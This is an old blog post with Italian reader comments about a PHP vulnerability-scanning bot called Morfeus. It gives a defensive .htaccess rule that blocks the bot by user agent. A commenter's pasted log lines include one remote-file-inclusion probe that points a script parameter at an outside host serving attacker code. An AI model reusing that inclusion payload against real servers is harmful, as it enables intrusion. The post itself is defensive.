If you read in your server log a strange user agent: "Morfeus Fucking Scanner" you have to know that it's a bot who scan PHP server application to find some vulnerability.
At the moment, the relative IP scanned this server is located in Spain, but reading old logs, it means many connection has been provide from USA.
Here all works fine. No vulnerability have been found on this server (ATM :-) ). My blogging software has no several bugs! Or just I hope so ;-) .
If you are running Apache like web server, you can easly block Morfeus by three .htaccess lines
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ - [F]
And, bye bye Morfeus ;-)
.Comments 
Mi hai incuriosito :) ...
primo:/var/log/apache2/primo# grep -ri Morfeus * | cut -d\ -f7,12-17 | sort | uniq
/bb/jscripts/post.js "Morfeus strikes again."
/bbs/jscripts/post.js "Morfeus strikes again."
/chat/jscripts/post.js "Morfeus strikes again."
/community/jscripts/post.js "Morfeus strikes again."
/foro/jscripts/post.js "Morfeus strikes again."
/foros/jscripts/post.js "Morfeus strikes again."
/forum/jscripts/post.js "Morfeus strikes again."
/forums/jscripts/post.js "Morfeus strikes again."
/jscripts/post.js "Morfeus strikes again."
/mybb/jscripts/post.js "Morfeus strikes again."
/myBB/jscripts/post.js "Morfeus strikes again."
/MyBB/jscripts/post.js "Morfeus strikes again."
/phgstats/index.php?phgdir=http://80.34.102.151/joomla/1.gif?/ "Morfeus Fucking Scanner"
/phorum/jscripts/post.js "Morfeus strikes again."
Sono troppo avanti: Tu hai Morfeus Fucking Scanner, io ho gia' Morfeus strikes again :D !!
Mi ricordo che ai tempi di codered, avevo usato una rule simile alla tua, ma rimandavo il traffico su ... 127.0.0.1 :P !
By Giambo (Sent 04/06/2008 @ 09:51:16)
Lo sai che qui in Sicilia tutto arriva dopo, anche i Morfeus li abbiamo datati :D
@Giambo
Che strano : qualche settimana fa , nel canale ubuntu-it un tizio si lamentava del fatto che nmap non funzionava e postava relativa riga di comando ; l'aveva anche postata sul forum di ubuntu ; sono quasi stato tentato di provare con il classico copia incolla, ma con programmi come nmap bisogna sempre andarci un po' cauti : in effetti il tizio aveva programmato un Idle Scan in cui l'Ip zombie apparteneva allo stesso range di IP che compare nei tuoi log ...
Mi sono fatto l'idea che il tizio avesse fatto una (maldestra) operazione di social engeneering , anche perchè aveva sostituito l'IP da scansionare con una pseudo variabile nominata $MIO-IP , confidando probabilmente nel fatto che i malcapitati sostituissero quel campo con il proprio IP. Nelle pagine del manuale di nmap mi sembra di aver letto che una scansione di questo tipo non restituisce alcun risultato , poichè tutto viene spedito all'IP zombie ; ma se a quell'IP c'è qualcosa che ascolta , il risultato della scansione giunge lì ... XD
Non ricordo il nick usato in Irc , nè quello sul forum ...ma il range si e non mi chiedere perchè XD
Quando ho realizzato le sue intenzioni , mi sono limitato a dirgli che c'aveva provato XD
Ok ok ... ho esagerato e probabilmente avrò preso un abbaglio formato gigante XD
By jj (Sent 05/06/2008 @ 15:30:23)
